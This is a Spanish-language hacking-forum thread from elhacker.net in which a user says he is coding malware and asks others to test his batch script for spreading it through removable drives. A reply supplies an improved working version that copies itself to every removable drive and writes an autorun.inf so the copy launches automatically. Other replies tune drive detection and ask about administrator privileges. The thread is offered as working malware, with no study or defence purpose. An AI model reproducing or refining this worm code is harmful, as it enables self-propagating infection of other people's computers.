elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Script batch para infeccion a traves de Unidades Extraibles
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Script batch para infeccion a traves de Unidades Extraibles  (Leído 6,387 veces)
LauBuru

Desconectado Desconectado

Mensajes: 37


Ver Perfil
Script batch para infeccion a traves de Unidades Extraibles
« en: 29 Marzo 2009, 21:39 pm »

Bueno estoy codeando un malware que no estya terminado, e optado por el metodo de propagacion a traves de unidades extraibles (USB,SlimCard,Memory Stick,etc...)
Os dejo un script para detectar e copyar archivos en unidades extraible, pruebenlo haber que les parece, no creo que haya errores pues funciona perfectamente, pero si encuentran algo diganmelo porfa

Un saludo gente    ;D


Código:
@echo off
echo. > unidad.txt
for %%a in ( A: B: C: D: E: F: G: H: I: J: K: L: M: N: Ñ: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) do (
 fsutil fsinfo drivetype %%a >> unidad.txt)
type unidad.txt | find "extra" >unExtra.txt
for /f "tokens=1" %%b in (unExtra.txt) do ( call :infect %%a)
:infect
set pam=%*
copy %systemroot%\system32\virus.bat %pam%\virus.bat || goto :eof



« Última modificación: 30 Marzo 2009, 08:26 am por LauBuru » En línea

69696969 start notepad.exe ::
Germaniac

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Script batch para infeccion a traves de Unidades Extraibles
« Respuesta #1 en: 30 Marzo 2009, 07:48 am »

La unidad Ñ: no existe y puedes obtener las unidades con
Código:
fsutil fsinfo drives
Lo probe y sale un mensaje de error que No hay disco en la unidad A: (mi unidad de disquete) porque no tengo ningun disquete dentro.


En línea

LauBuru

Desconectado Desconectado

Mensajes: 37


Ver Perfil
Re: Script batch para infeccion a traves de Unidades Extraibles
« Respuesta #2 en: 30 Marzo 2009, 08:32 am »

Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje

Un saludo   :)

PD:Modifique el code para evitar esos errores,  ;D
En línea

69696969 start notepad.exe ::
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: Script batch para infeccion a traves de Unidades Extraibles
« Respuesta #3 en: 30 Marzo 2009, 16:00 pm »

Creo que deberias usa otro medoto que sea factible para cualquier usuario, porque el uso de FSUTIL esta limitado a users con privilegios administrativos...

Código:
@echo off
for %%a in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f "tokens=1" %%b in ('fsutil fsinfo drivetype %%a:^| find "extra"') do (
copy /y "%~0" "%%b:\codigo.bat"&echo.[autorun]>>"%%b:\autorun.inf"&echo.open=codigo.bat>>"%%b:\autorun.inf"))
Goto :Eof

Tambien podrias en el segundo FOR crear un ARRAY con todas las Letras que corresponden a los extraibles y guardarlo como variable para usarlo en cualqueir lado....

Saludos.
En línea


LauBuru

Desconectado Desconectado

Mensajes: 37


Ver Perfil
Re: Script batch para infeccion a traves de Unidades Extraibles
« Respuesta #4 en: 30 Marzo 2009, 22:08 pm »

Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca  XD


Un saludo makinas   ;D


PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?)
En línea

69696969 start notepad.exe ::
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines